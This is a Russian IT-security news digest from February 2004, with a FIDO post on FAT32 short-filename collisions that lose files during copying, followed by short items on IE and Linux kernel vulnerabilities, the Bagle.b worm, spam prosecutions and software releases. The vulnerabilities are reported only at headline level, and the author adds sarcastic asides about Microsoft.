Довольно интересное сообщение появилось в эхе ФИДО fido7.su.os2. Дабы избежать неверного изложения, приводим полностью сообщение автора (Alexey): "Прочтите это. Речь об ОПАСHОМ и неустранимом глюке. Создал я общий для винды и OS/2 раздел FAT32 на 16Г, запустил туда копировать всякое файлО, лежащее в одном каталоге. Копировал при помощи DN/2 весь каталог целиком, не заходя внутрь. Вдруг выскакивает сообщение с предложением перезаписать существующий файл. Hу, думаю, ничего себе, глюк в DN. Запускаю другой DN, смотрю в тот каталог - нет там такого файла. Ладно, запускаю FC/2, копирую тот подкаталог, где эта накладка - а FC тоже просит подтвердить перезапись файла. Интересно. Присматриваюсь к именам, и тут доходит, что же произошло. Файлы там лежат (если отбросить несущественные) такие:
cdrtools2-1.11a38.zip 660,362
cdrtoo~1.zip 1,477,445
Так вот, хоть мы и не видим коротких имён, но они есть, как тот суслик. И cdrtools2-1.11a38.zip наверняка получил короткое имя cdrtoo~1.zip, с которым и пересёкся второй файл. Так что и драйвер, и оба коммандера вели себя достойно, а глюк генетически присущ файловой системе. Стало интересно, что же произойдёт, если дать разрешение на перезапись. После FC/2 остался файл cdrtoo~1.zip 1,477,445, то есть файл cdrtools2-1.11a38.zip оказался потерян. А после DN/2 и команд copy и xcopy (их я тоже проверил) получилось такое, что и в страшном сне не привидится: cdrtools2-1.11a38.zip 1,477,445. То есть содержимое файла cdrtools2-1.11a38.zip потерялось, а его имя оказалось присвоено содержимому файла cdrtoo~1.zip. При этом xcopy не выдавал запрос на перезапись независимо от наличия ключика /O. Hе поленился перегрузиться в XP и посмотреть, как дело обстоит там. А там ещё круче. Если использовать DN/2, copy и xcopy, то результат такой же, как в OS/2 - новый файл подкладывается под старое имя. А если копировать проводником, то всё нормально. То есть мелкомягкие об этом глюке знают и в проводнике замели мусор под ковёр, а в cmd и xcopy - забыли. Так вот. Hадо внести в FAQ и зарубить на носу, что вслепую копировать файлы на FAT32 - ОПАСHО. Hи в коем случае нельзя это делать с отключённым подтверждением перезаписи. И в случае каких-то неожиданных сообщений о дублировании имён файлов надо не спешить и разобраться - иначе можно потерять файлы, да ещё и схлопотать произвольное комбинирование имён и содержимого файлов. И ни в коем случае нельзя пользоваться командой xcopy, если целевой диск - FAT32. Можно потерять файлы и перепутать имена без всяких сообщений об ошибках". Уточнение: DN/2 - Disk Navigator/2 для OS/2, FC/2 - File Commander/2 для OS/2.
Источник - http://www.fido7.ru

19/02/2004 17:23 Опять Internet Exlorer.
Продолжая предыдущую тему.... Опять уязвимость в IE Обнаружили. До кучи и AOL IM оказался уязвимым. На сей раз оказалось, что сформировав определённый ХТМЛ-файл (который таковым не является) можно успешно выполнить произвольный код на компьютере жертвы в зоне My Computer. Как утверждают авторы - очередной плацдарм для новых червей/троянов. Ну и как положено - "Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox)". ;))) Очердной привет руководимому Дергуновой офису небезызвестной фирмы.
Подробности - http://www.securityfocus.com/archive/1/354448/2004-02-16/2004-02-22/0

19/02/2004 16:06 Уязвимость в Internet Explorer.
Казалось бы, откуда в таком "надёжном" браузере, которым являетеся Internet Explorer (привет Ольге Дергуновой и Биллу Гейтсу) взяться уязвимости? Ведь Гостехкоммиссия признала Вынь ХР надёжной ОС. Насколько я понимаю IE является неотмелемой частью этой ОС. Тем не менее злобные хакеры почему-то упорно находят в "самой защищённой ОС" уязвимости. Буквально только что Berman Enconado из TrendMicro опубликовал наличие уязвимости в IE, который можно проломить путём формирования специального CLSID-параметра. Передача подобного параметра на машину жертвы позволяет выполнить любой код на оной. Суть уязвимости скрывается в процессе обработке CHM-файла. Авторы приводят пример эксплоита и в качестве одной из мер защиты советуют пользователям наконец-то избавиться от "самого лучшего браузера".
Подробности - http://www.securityfocus.com/archive/1/354447/2004-02-16/2004-02-22/0

19/02/2004 15:47 Ещё одна уязвимость в ядре Linux.
Уязвимость обнаружена в Linux 2.6 kernel в ncpfs. Локальный пользователь может получить привилегии суперпользователя. Сообщается, что ncp_lookup() не проверяет длину переданных параметров. В результате локальный пользователь может переполнить стековый буфер и выполнить произвольный код на системе.
Подробности - http://www.securitylab.ru/42922.html

19/02/2004 12:46 Южная Корея оштрафовала 28 спамеров.
Власти Республики Корея 18 февраля оштрафовали 28 человек, занимавшихся рассылкой спама, сообщает агентство Yonhap. Общая сумма штрафов составила 114 миллионов вон (2,8 миллиона рублей). Штрафы были наложены на спамеров, которые продолжали слать свои предложения людям, заявившим о нежелании получать письма коммерческого содержания.
Источник - http://www.viruslist.com

19/02/2004 11:33 Гостехкомиссия России признала Windows XP безопасным для секретных операций!
Ну не знаю! Публикую исключительно в качестве курьёза и моего личного отношения к экспертам этой самой "ГОСТЕХКОМИССИИ". Такое ощущение, что эти господа проверяли эту самую ХР в бункере, отрезанные от всего внешнего мира! Операционная система Windows XP получила сертификат Гостехкомиссии при президенте РФ, сообщается на сайте газеты "Известия". Таким образом, продукция компании Microsoft признана годной для обработки конфиденциальной информации в госструктурах России. Экспертизу на протяжении десяти месяцев (охренеть! прим.переводчика - ЧТО можно делать с этой ОС на протяжении такого количества времени?) производили эксперты из ООО "Центр безопасности информации", в котором работают бывшие сотрудники оборонных НИИ. Они тестировали Windows XP на предмет защиты конфиденциальной информации от несанкционированного доступа. По признанию специалистов, программисты Microsoft ошибок не допустили, и продукцию компании можно использовать для обработки данных "для служебного пользования". Однако сертификация не гарантирует полной безопасности. Для того чтобы лицензия Гостехкомиссии оставалось действительной, в программе нельзя модифицировать ни одного байта информации. Тем не менее, Microsoft ежемесячно выпускает официальные обновления, некоторые из которых предназначены для устранения "критических ошибок" в системе безопасности. Господа, а дальше все слушаем внимательно речь госпожи Дергуновой, волей судеб поставленной в нашей Богом забытой стране представлять интересы Билла (перекрестившишись) Гей-Тса... Так вот, госпожа Дергунова сказала буквально следующее: "пользователи должны сами решать, что им важнее - сохранение сертификата или установка обновлений. Но главными в решении этой проблемы остаются системные администраторы и специалисты служб безопасности. Ведь компьютер будет недоступен влиянию извне, только если его отключить от интранета и интернета, а также запретить пользоваться CD, дискетами и флэш-памятью". Вот так вот.
Источник - http://www.izvestia.ru

18/02/2004 18:42 Исходник для проверки уязвимости ядра Linux.
Вслед за опубликованием уязвимости в ядрах Linux была выпущена программка при помощи которой можно проверить наличие уязвимости в ядрах Linux. Автор исходников довольно знаменитый Christophe Devine (помимо прочего - им недавно выпущен эксплоит уязвимости в Windows ASN.1 (он же MS04-007)).
Подробности - http://lists.netsys.com/pipermail/full-disclosure/2004-February/017498.html

18/02/2004 18:33 Очередная уязвимость в ядре Linux.
Ну вот. буквально только что специалисты из польской группы iSEC Security Research в лице Paul Starzetz сообщили о существовании уязвимости в коде ядра ОС Linux и, что примечательно, в том же самом системном вызове mremap(2). Напомним, что прошлая уязвимость (месячной давности - от 05/01/2004) тоже была в этом же вызове в функции do_mremap. Природа уязвимости несколько отличается и связана с отсутствием проверки значения возврата функции. Сама уязвимость кроется в механизме работы с дескрипторами адресации виртуальной памяти (VMA). Помимо функции do_mremap(), связанной с изменением виртуальной памяти процесса, уязвимость обнаружена в схожей функции - do_munmap(), связанной с перемещением памяти внутри адресного пространства процесса. Авторы утверждают о создании эксплоита при помощи которого можно получить локально права суперпользователя (root) и обещают опубликовать его в течении следующей недели. Уязвимости подвержены версии: <= 2.2.25, <= 2.2.24 и <= 2.6.1. Рекомендуется дождаться обновления от производителей дистрибутивов и срочно обновиться. Помимо повышения прав локального пользователя также возможно проведение (локально) атаки типа DoS.
Подробности - http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt

18/02/2004 17:18 В США участились случаи взлома беспроводных сетей.
29-летний консультант по защите информации Клейтон Диллард, обвинен во вторжении в беспроводную компьютерную систему больницы Wake Internal Medicine Consultants (США) и незаконном сборе данных о сотнях пациентов. Диллард обвиняется по статьям: нарушение границ использования компьютера, незаконный доступ к чужому компьютеру. Предположительно, мошенник проник в компьютерную сеть больницы, после чего отправил в администрацию клиники письмо, содержащее копии чеков и страховых полисов пациентов. Он также вошел в контакт с пациентами и страховыми компаниями, сообщив им о слабой защищенности ИТ-системы клиники. Инцидент расследуется.
Источник - http://www.xatrix.org/

18/02/2004 16:52 Рассылка спама стала причиной выхода из строя почтовых серверов.
По сообщению компании "Таисия Телеком" (Ставрополь), неделю назад, 12 февраля 2004 г., массовая рассылка спама стала причиной временной неработоспособности почтовых серверов компании. Первоначально сотрудники компании предположили, что сервер стал объектом атаки, - с 12:48 до 16:31 бало получено больше количество автоматических сообщений со случайно сформированным именем получателя. Нагрузка достигла максимума в 14:05. В результате перегрузки почтовые службы были временно недоступны. Позднее было установлено, что перегрузка была вызвана массовой рассылкой аналога "нигерийских писем". Очевидно, подобные методы рассылки, даже при отсутствии злого умысла, могут вызывать крах почтовых систем.
Источник - http://www.provider.net.ru

18/02/2004 15:38 RIAA не успокаивается.
531 пользователь интернета стал объектом судебного преследования в интернете. Все они подозреваются в незаконном распространении музыки в сети, cообщает bugtraq.ru. С обвинением выступила Ассоциация звукозаписывающей индустрии Америки (RIAA). Судебные иски по ее требованию выдвинуты против пользователей в Атланте, Филадельфии, Орландо (Флорида) и Трентоне (Нью-Джерси). По данным ассоциации, все ответчики - клиенты одного из 5 интернет-провайдеров, базирующихся в этих городах.
Подробности - http://top.rbc.ru/index.shtml?/news/incidents/2004/02/18/18030837_bod.shtml

18/02/2004 15:02 «Мастерхост» отбивает DDoS-атаку.
По сообщению пресс-службы компании «Мастерхост», сегодня в 1:30 ночи началась распределенная DDoS-атака на серверы хостинг-провайдера, которая продолжается до сих пор. Поступающий таким образом паразитный трафик мешает нормальному соединению с рядом ресурсов, расположенных на технической площадке фирмы. В настоящий момент технические специалисты «Мастерхоста» проводят работы по стабилизации положения, в частности, по увеличению пропускной способности оборудования. Компания обещает перечислить компенсацию на виртуальные счета тех своих клиентов, доступ к сайтам которых был невозможен по вышеуказанной причине.
Источник - http://www.securitylab.ru

18/02/2004 14:05 Panda Software обновила антивирусы для почтовых серверов Linux.
Компания Panda Software выпустила новые версии антивирусов для почтовых платформ Linux (Sendmail, Qmail и Postfix). В новые версии включена опция проверки фрагментированных сообщений. Благодаря этому оптимизируется производительность сервера, так как теперь для проверки и обезвреживания не требуется загружать на компьютер сообщение целиком, что особенно полезно в периоды вирусных эпидемий, когда сервер может получать тысячи зараженных сообщений в минуту. Panda SendmailSecure, QmailSecure и PostfixSecure теперь могут определять сообщения, использующие брешь iFRAME/MIME. Данная брешь позволяет новым вредоносным кодам обманывать систему путем использования ложного MIME заголовка сообщения. Panda SendmailSecure, QmailSecure и PostfixSecure блокируют вирусы, которые автоматически запускаются при просмотре сообщения в окне предварительного просмотра. Вирусы блокируются на уровне почтового шлюза. Как следствие, сокращается количество получаемых пользователем предупреждений и не перегружаются почтовые ящики на сервере. Управление Panda SendmailSecure, QmailSecure и PostfixSecure осуществляется через консоль управления Panda AdminSecure, которая позволяет централизованно, с одного компьютера, производить установку, настройку, управление, а также решать иные задачи, связанные с этими антивирусными продуктами.
Источник - http://www.viruslab.ru

18/02/2004 13:12 Китай разбирается со спаммерами.
Министерство общественной безопасности (МОБ) Китая объявило о начале кампании по борьбе со спамом, в которую также должны включиться Министерство образования и Министерство информационной промышленности Поднебесной. Впрочем, борьба с несанкционированной рассылкой электронной почты, похоже, будет иметь специфическую окраску. Как пишет PC World, китайский аналог КГБ собирается объявить войну отнюдь не только (и, вполне возможно, не столько) распространителям дешевых заменителей Виагры или агентам игорного и порнобизнеса. Как сообщается в официальном заявлении МОБ, на которое ссылается журнал, официальный Пекин имеет в виду и «реакционный спам», то есть, распространителей «электронных листовок», призывающих к «свержению существующего строя» и требующих свободы слова. То есть, если в оффлайне диссидентов мочат в сортирах, прикрываясь лозунгами о борьбе с терроризмом, то в Сети их будут давить, используя в качестве дубины антиспаммерские умонастроения мировой общественности.
Источник - http://www.internet.ru

18/02/2004 12:48 Windows XP подбирается к вашим карманам.
Компания Vulcan, известная на данный момент тем, что ее основателем является Пол Аллен (один из сооснователей Microsoft), в самое ближайшее время планирует прославиться еще и тем, что выпустит самый маленький компьютер FlipStart, работающий под управлением Windows XP. Новинка будет представлена на конференции DEMO 2004. Устройство, вес которого составляет 450 грамм при размерах 148x101x26мм, оборудовано 1ГГц процессором от Transmeta, имеет 256Мб оперативной памяти и 30Гб жесткий диск. Имеются встроенный модуль WiFi и 1.3-мегапиксельная камера. Дисплей с диагональю 5.6 дюйма имеет разрешение 1024x600, а видеокарта имеет 8Мб выделенной памяти. Время работы от аккумулятора составляет 3 часа при работе с Windows XP и до суток работы при использовании только камеры или mp3-плеера, который управляется с верхней панели устройства. К сожалению, сведений о цене на данное устройство пока нет.
Источник - http://www.mobile-review.com

18/02/2004 12:35 Lindows переименовали в Lindash.
В тех странах, где корпорация Microsoft добилась запрета на дистрибуцию продуктов на базе кода Linux, операционная система Lindows остается доступной, правда под именем Lin---s (произносится, как «линдаш»). Переименование было вызвано постановлением суда. Мы уже писали о том, что голландская Фемида потребовала у руководителей Lindows.com изменить название или закрыть ресурс для стран Бенилюкса. «Удалив три буквы из имени нашего продукта, мы не создаем путаницы относительно торговой марки Microsoft – «windows» - и в то же время продолжаем предлагать свое решение на рынке ПО», - комментирует Майкл Робертсон, президент Lindows.com. – «Любые действия Microsoft по запрету Lin---s продемонстрируют их истинные намерения, которые заключаются не в защите торговой марки, а в попытках уничтожить конкурентов и сохранить собственную монополию». Кроме того, создатели Lindows открыли несколько новых веб-ресурсов Lin---s.com и Lindash.nl. Что касается первого сайта, то на главной странице изображен подвешенный человечек и английский алфавит, где зачеркнуты все буквы, за исключением «d», «o», «w».
Источник - http://www.runet.ru

18/02/2004 10:41 Выход ядра Linux 2.6.3.
Объявлено о выходе третьей версии ядра Linux ветки 2.6. Изменений доворльно много: обновлен набор драйверов звуковых карт ALSA (Advanced Linux Sound Architecture) в том числе и поддержка OSS (Open Sound System), обновлён набор драйверов для поддержки USB, улучшены драйвера некоторых сетевых карт, карт PCMCIA и др.
Подробности - http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.3

18/02/2004 09:59 Американская компания заплатит 75000 фунтов за рассылку спама британцам.
Британские власти обязали американскую компанию выплатить крупный штраф за рассылку спама британским пользователям Интернета. Как сообщается на сайте BBC News, письма порнографического характера, рассылавшиеся компанией BW Telecom, содержали кнопку закрытия сообщения, которая, вместо закрытия окна, переводила получившего сообщение пользователя на интернет-ресурс, доступ к которому осуществлялся по платной телефонной линии за 1,50 фунта стерлингов в минуту. При этом плата за пользование ресурсом взималась даже в том случае, если пользователь продолжал работу на других сайтах. Британская организация ICSTIS (Independent Committee for the Supervision of Standards of Telephone Information Services), занимающаяся мониторингом платных линий, получила более 1000 жалоб на рассылку BW Telecom. Убытки отдельных пользователей, пострадавших от деятельности американской компании, составили до 200 фунтов. Сумма штрафа, назначенного ICSTIS BW Telecom, составила 75000 фунтов стерлингов.
Подробности - http://newsvote.bbc.co.uk/mpapps/pagetools/...

17/02/2004 17:20 Как обойти PatchFinder?
Edgar Barbosa написал любопытный документ, в котором описывается метод обхода механизма анализа пути выполнения (Execution Path Analysis), который применяется в утилите PatchFinder для обнаружения руткитов в ОС Windows 2k/XP. Для версии Linux будет выпущен позже. Документ доступен в PDF-формате.
Скачать - http://www.geocities.com/embarbosa/bypass/bypassEPA.pdf

17/02/2004 17:06 Выход GCC 3.3.3.
Вышла новая версия популярного в мире открытых систем компилятора GCC. Выпускается на основе GPL. Устранено большое количество багов, внутренние ошибки компиляции, ошибки библиотек.
Подробности - http://www.gnu.org/software/gcc/gcc-3.3/changes.html#3.3.3

17/02/2004 16:12 В Костромской области органами ФСБ задержан хакер.
В Костромской области органами ФСБ задержан хакер - студент одного из костромских ВУЗов. "В ходе проведенного 13 февраля обыска на квартире студента были обнаружены носители с вредоносными и предназначенными для осуществления неправомерного доступа к компьютерной информации программами", - сообщили сегодня в ЦОС ФСБ РФ. У злоумышленника изъяты персональный ЭВМ со следами совершенного преступления, а также иные материалы, подтверждающие причастность подозреваемого к совершенному правонарушению. С подозреваемого, который в ходе следственный действий признался в содеянном и подробно изложил обстоятельства совершения преступления, взята подписка о невыезде, передает ИТАР-ТАСС. "В ходе проведения неотложных следственных действий костромич признался в содеянном и подробно изложил обстоятельства совершения преступления. К подозреваемому применена мера пресечения в виде подписки о невыезде".
Источник - http://www.securitylab.ru

17/02/2004 15:02 MSBlast-подобный эксплойт на свободе.
Код, использующий критическую уязвимость, для которой Microsoft выпустила пач на прошлой неделе, вырвался на волю, угрожая владельцам компьютеров атакой в стиле MSBlast. 10 февраля Microsoft выпустила поправку, устраняющую ошибку сетевого ПО, которая делает уязвимыми все системы Windows XP, NT, 2000 и Windows Server 2003. Компания предупредила владельцев ПК, что эта уязвимость может быть использована писателями вирусов и червей. И вот, спустя всего четыре дня после выхода обновления, на французском веб-сайте появился код, позволяющий любому воспользоваться ошибкой. Это означает, что не обновившие свои системы пользователи могут подвергнуться новой атаке червя, подобного MSBlast. Ричард Штернз, директор по экстренному реагированию компании Cable & Wireless, подтвердил ZDNet UK, что код, похоже, работает. «Мы исполнили скомпилированный код на необновленных системах ХР и Windows 2000 SP3, и обе они вышли из строя. Код вызывает переполнение буфера и немедленно переводит ПК в состояние перезагрузки, из которого невозможно выйти». По словам Штернза, опубликованный эксплойт легко превратить еще в одну «смешанную атаку» вроде MSBlast или Code Red, когда червь состоит из двух разных модулей, один из которых отвечает за распространение, а другой содержит разрушительный заряд. «Наступила эпоха двухфазных, или двухуровневых, червей. Подавляющее большинство червей, которые мы наблюдали раньше, заботились только о собственном размножении. Теперь же они несут вторую нагрузку, направленную на организацию атаки DDoS».
Подробности - http://news.zdnet.co.uk/internet/security/0,39020375,39146606,00.htm

17/02/2004 14:30 Первые плоды публикации исходников Windows?
М-да... Похоже, как только исходники ОС Windows попали в Интернет, тут же стали обнаруживаться новые уязвимости. На сайте Securitytracker некий хакер опубликовал довольно любопытную информацию. По его словам, он скачал себе опубликованный исходный код Win2K. При исследовании оного в файле win2k/private/inet/mshtml/src/site/download/imgbmp.cxx была обнаружена возможность переполнения буфера с дальнейшим выполнением произвольного кода. Для этого достаточно сформировать определённый BMP-файл, при открытии которого в IE5 возникает возможность запустить любую программу. Пример файла, закодированного в BASE64 приведён. В версии 6 IE уязвимость пока (!) не обнаружена. Ожидаем новой версии трояна? ;)) Microsoft пока никак не отреагировала на уязвимость.
Подробности - http://www.securitytracker.com/alerts/2004/Feb/1009067.html

17/02/2004 14:08 Сервер калифорнийской службы занятости взломали для рассылки спама.
Калифорнийский департамент развития труда (EDD) на минувшей неделе сообщил неприятную новость 90600 своих клиентов: возможно, их персональные данные, в том числе номера социального страхования, оказались похищены в ходе январской хакерской атаки. Подобное стало возможным после открытия экспериментального проекта департамента, сообщает сайт газеты San-Francisco Chronicle. Сотрудники департамента развития труда намеревались оказать дополнительное содействие людям, занимающимся поисками работников для обеспечения домашних нужд: садовников, нянь и сиделок. С этой целью была создана система, позволяющая сообщать EDD сведения о налоговых платежах через интернет. На сервере службы были размещены персональные данные 55 тысяч работников и 35600 работодателей. Сервер с ценной информацией стал инструментом неизвестного хакера, который использовал его для рассылки спамовых коммерческих предложений в Таиланд и Республику Корея. «У хакера была возможность увидеть хранящуюся на сервере информацию. У нас нет никаких свидетельств того, что информация с сервера была скопирована. Возможно, хакер не знал, до чего сумел добраться», - заявил один из участников группы, занимающейся расследованием инцидента.
Источник - http://www.viruslist.com

17/02/2004 13:41 Microsoft запретит поп-ап рекламу на своих сайтах.
К лету 2004 года Microsoft избавится от так называемой выскакивающей (поп-ап) рекламы на своих сайтах, сообщает BBC News. Вместо этого, пользователи будут смотреть 30-секундные рекламные видеоролики, аналогичные тем, что показывают на телевидении. Microsoft начала блокировать выскакивающие окна с рекламой на своих американских сайтах еще в конце прошлого года. Теперь такая реклама будет запрещена на британских, скандинавских и бельгийских сайтах корпорации. Со временем запрет распространиться и на другие страны. Соответственно прекращается и предоставление подобных услуг рекламодателям. Чтобы не терять доходы, Microsoft вместе с компанией Unicast разработала другой вид виртуальной рекламы. Теперь при заходе на определенные сайты пользователям будут предлагаться рекламные видеоролики, как на телевидении. В ближайшие пять недель новая видеореклама появится на 15 сайтах, в том числе MSN, ABCNews, Pepsi и Honda. К такому решению софтверного гиганта подтолкнули результаты недавно проведенного исследования, которые показали, что большинство пользователей не любят выскакивающую рекламу, о чем посетители интернета и так хорошо знали. Собственно говоря, во многих браузерах (кроме IE, разумеется) имеется опция блокирования подобной рекламы.
Подробности - http://news.bbc.co.uk/2/hi/technology/3487225.stm

17/02/2004 13:12 Новая модификация сетевого червя "Bagle" вызывает глобальную эпидемию.
"Лаборатория Касперского" сообщает об обнаружении новой модификации известного сетевого червя "I-Worm.Bagle" - "I-Worm.Bagle.b". На настоящий момент получено несколько сотен сообщений от пользователей по всему миру, получивших зараженную данным червем корреспонденцию. По минимальным оценкам, в настоящее время количество содержащих "Bagle.b" писем, зарегистрированное в глобальном почтовом трафике, составляет более 20000, и их число стремительно увеличивается. Новая версия "I-Worm.Bagle" функционально во многом повторяет свою предшественницу. Вредоносная программа распространяется через электронную почту в виде вложений в электронные письма. Червь представляет собой исполняемый в среде Windows файл размером 11 Кб, приложенный к письму с заголовком "ID х... thanks" и текстом "Yours ID x: Thank", где х - произвольный набор символов. После запуска червь копирует себя в системный каталог Windows и регистрирует себя в ключе автозапуска системного реестра. При этом для дезориентации пользователя червь инициирует запуск стандартной утилиты Windows, Sound Recorder (sndrec32.exe). Затем Bagle.b пытается установить соединение с несколькими удаленными сайтами, так или иначе связанными с "троянским" прокси-сервером TrojanProxy.Win32.Mitglieder. В настоящее время ссылки на все сетевые источники загрузки Mitglieder удалены, и "I-Worm.Bagle" неспособен использовать данную технологию для увеличения темпов самораспространения. Однако наибольшую опасность для зараженного компьютера представляет встроенная в тело червя троянская компонента. Она открывает на пораженной машине порт 8866, и в дальнейшем отслеживает его работу. Это дает злоумышленникам доступ к удаленному управлению компьютером, в частности, позволяет запускать на выполнение различные команды и загружать файлы по усмотрению автора червя.
Источник - http://www.kaspersky.ru

16/02/2004 15:47 Неофициальный сервис-пак для Win98SE?
Был обнаружен сайтик, держатель которого, Alper Coskun, якобы выпускает неофициальные сервис-паки (набор обновлений) для ОС Win98SE (есть там ссылка и на ME). Им собраны в одном "флаконе" все хот-фиксы, которые выпускает M$. Как пишет сам автор, сюда не включены различные обновления для IE, DirectX 9 и Media Player. Предназначен только для английской версии Win98. В новую версию (1.1) включены 58 хотфиксов от Майкрософт, 256-цветный трэй, улучшена работа дефрагментатора и скандиска, обновлены DCOM98 и OLE Automation и многое другое. Естественно, этот сервис-пак является неофициальным, а посему, как говорится, "на свой страх и риск". Размер - 7.57 МБ.
Сайт - http://exuberant.web1000.com/98sesp.html

16/02/2004 15:39 Siemens предлагает обновление системного ПО для Siemens SX1.
Компания Siemens подготовила обновление системного ПО для своего смартфона Siemens SX1, сообщает mobile-review.com. Скачать обновление и его установить пользователям предлагается самим, воспользовавшись специализированным сервисом на сайте My-Siemens. Также стало известно о том, что Siemens заключила договор с компанией Symbianware, по которому некоторые из программных продуктов последней2 станут доступными для бесплатного скачивания владельцами смартфонов Siemens SX1. На данный момент на сайте Siemens доступны игры AstroNix, PowerBall, а также приложения FullScreen Caller и PowerLock.
Обновление - http://www.my-siemens.com/MySiemens/CDA/Index/...

16/02/2004 14:34 Корпорация Microsoft никак не может избавиться от свастики.
Софтверный гигант был вынужден принести извинения общественности после того, как в новых копиях популярного программного обеспечения был обнаружен фашистский символ. По свидетельству представителя компании, на данный момент свастика удалена из последней версии широко распространенной серии Office. «Дурной символ» появился, как опция в директории шрифта Bookshelf Symbol 7, где представлено огромное количество знаков для пользователей пакета программ Office 2003, поступившего в продажу в конце прошлого года. Компания Microsoft не понимает, как символ попал в программное обеспечение. Предположительно не сработали контрольные меры по предотвращению появления в ПО оскорбительных знаков. Тем не менее, софтверный гигант оправдывается, заявляя, что шрифт Bookshelf не является их личной разработкой.
Источник - http://www.runet.ru

16/02/2004 14:15 Новый протокол вместо "заплаты".
Cisco Systems представила на рассмотрение IETF проект спецификации нового варианта расширяемого протокола аутентификации (Extensible Authentication Protocol, EAP) для беспроводных локальных сетей, который, как утверждается, лишен недостатков, обнаруженных в разработанном Cisco протоколе Lightweight EAP (LEAP). Новая спецификация носит название EAP Flexible Authentication via Secure Tunneling (EAP FAST). В середине прошлого года появились средства, позволяющие "взломать" LEAP путем перехвата сеанса аутентификации и угадывания пароля методом перебора по словарю. В качестве меры предосторожности Cisco рекомендовала пользоваться другим типом EAP - Protected EAP (PEAP), разработанным компанией совместно с Microsoft и RSA Security. Однако он требует применения довольно сложной инфраструктуры цифровых сертификатов для формирования в сети защищенного туннеля между двумя участниками сеанса связи. EAP FAST реализует механизм, по поведению не отличающийся от LEAP, но создающий защищенный туннель без использования сертификатов. EAP FAST будет реализован в составе сервера безопасности Cisco Secure ACS и в платах WLAN-адаптеров Aironet. Кроме того, реализация протокола будет присутствовать в Cisco Compatability Extensions 3.0 - спецификации, регламентирующей правила написания совместимых драйверов для Cisco IOS.
Источник - http://www.osp.ru

16/02/2004 13:23 Solaris 10 планируется выпустить в 2004 г.
Как пишет The Register, выпуск Solaris 10 намечен на вторую половину 2004 года. Об этом газете поведал Jonathan Schwartz, руководитель направления ПО фирмы Sun Microsystems. Также Джонатан поделился далекоидущими планами по завоеванию господства в мире ОС софтверным гигантом, где компания рассчитывает потеснить позиции AIX (творение IBM) и HP-UX (ОС Hewlett Packard) в классе высокопроизводительных серверов, а также позиции Linux в так называемом "loe-end" классе. Solaris 10 естественно, будет 64-разрядной ОС с поддержкой традиционной платформы SPARC, а также процессоров семейства Intel - Opteron. Также компания планирует представить в этой версии ОС ПО под названием N1 Grid Containers, цель которого составить конкуренцию LPAR (logical partitions) AIX и HP-UX, а также ПО поддержки виртуальных машин VMware/EMC для Windows/Linux - серверов. Также в новой ОС будет представлен инструментарий диагностирования "железа" - DTrace, новый переработанный сетевой стэк TCP/IP и новый механизм безопасности, суть которого сводится к возможности суперпользователя (рута) создавать как бы мини-рутиков :), функциональность которых будет значительно сужена специфическими задачами (например, возможностью исправления ПО без вмешательства в железячную часть компьютера).
Подробности - http://www.theregister.co.uk/content/61/35569.html

16/02/2004 13:02 Организация защищённой связи между Linux и Windows-клмпьютерами.
На сайте Алексея Аксёнова рассказывается о том, как организовать защищённый при помощи протокола IPSEC канал связи между Linux и Windows-машинами. Со сторны Linux задействован пакет FreeS/WAN, со стороны Windows - Transport Mode c использованием PSK (publicly shared key).
Cтатья - http://www.ezh.msk.ru/article/ipsec/

16/02/2004 12:27 Выход журнала Crypto-Gram.
По традиции 15 числа вышел очередной, февральский, номер ежемесячного журнала Crypto-Gram, посвящённого компьютерной безопасности. Об этом сообщил Bruce Schneier, основатель и CTO компании Counterpane Internet Security, Inc., под "крышей" которой выпускается журнал. В этом номере: Towards Universal Surveillance; The Politicization of Security; News; Counterpane News; Book News; Identification and Security; Crypto-Gram Reprints; The Doghouse: E-mail Readers; The Economics of Spam; Comments from Readers.
Подробности - http://www.schneier.com/crypto-gram-0402.html

16/02/2004 11:03 Недельный отчет о вирусах Panda Software.
Опубликован традиционный, еженедельный отчёт о вирусной активности прошедшей недели от Panda Software. В нём рассмотрены девять червей, троянец, утилита скрытого управления и рекламная программа. Семь из девяти червей, упоминаемых в отчёте, так или иначе связаны с Mydoom.
Подробности - http://www.viruslab.ru/press/index.php?go=show&num=244

16/02/2004 10:37 Lindows.com защитит клиентов от SCO.
Компания Lindows.com, поставщик одноименной операционной системы на базе Linux, объявила, что все ее клиенты защищены от возможных судебных разбирательств с SCO. По крайней мере, существующее ныне соглашение между Lindows.com и SCO не позволяет последней требовать от пользователей ОС Lindows выплаты лицензионных отчислений. Многие ведущие поставщики дистрибутивов Linux уже объявили о запуске специальных программ по защите своих клиентов от SCO. К примеру, с подобными инициативами выступили фирмы Red Hat, Hewlett-Packard и другие.
Подробности - http://www.newsfactor.com/story.xhtml?...

16/02/2004 10:08 Полиция Бельгии арестовала 19-летнюю вирусописательницу.
Полиция Бельгии на сутки арестовала 19-летнюю студентку технического ВУЗа по обвинению в создании компьютерных вирусов, сообщает Associated Press. Девушке, в кругу своих знакомых известной как Gigabyte, предъявлены обвинения в нарушении принятого в 2000 году закона о киберпреступлениях. В частности, именно её антивирусные эксперты «Лаборатории Касперского» подозревают в создании изрядно нашумевшего в прошлом году семейства почтовых червей Sobig. Во время ареста полицейские конфисковали у бельгийки пять компьютеров и закрыли ее персональный сайт. «Она собиралась разместить на своем сайте новые вирусы», - сообщил представитель правоохранительных органов. Инспектор подразделения по борьбе с компьютерными преступлениями считает, что задержанная студентка крайне талантлива. Полицейский выразил сожаление, что таланты Gigabyte направлены в отрицательное русло. Возраст и половая принадлежность позволили Gigabyte завоевать известность в преимущественно мужской среде вирусописателей. В интервью, данном сайту www.techtv.com в 2002 году, девушка отметила, что никогда не распространяла написанные ей вирусы, а лишь размещала их на собственном сайте. По данным TechTV, Gigabyte начала писать программы в возрасте 6 лет. В 14 лет она создала своего первого червя, а к 18 стала вторым человеком, для создания вируса воспользовавшимся C#.
Источник - http://www.viruslist.com

15/02/2004 17:10 Обновление QuarkXPress.
Компания Quark выпустила обновление созданной ею издательской системы - QuarkXPress 6.1. Размер обновления - 78,4 Мбайт. Для установки обновления потребуется дистрибутив QuarkXPress 6.0. Согласно заявлению компании, обновленная версия системы поддерживает Mac OS X 10.3 (Panther). Улучшена интеграция QuarkXPress с Microsoft Excel, добавлена функция выбора изображения с автоматическим открытием его для редактирования в заданном приложении, а также утилита, предоставляющая пользователю возможность создания правил автоматической замены отсутствующих в системе шрифтов.
Обновление - http://www.quark.com/products/xpress/61update.html

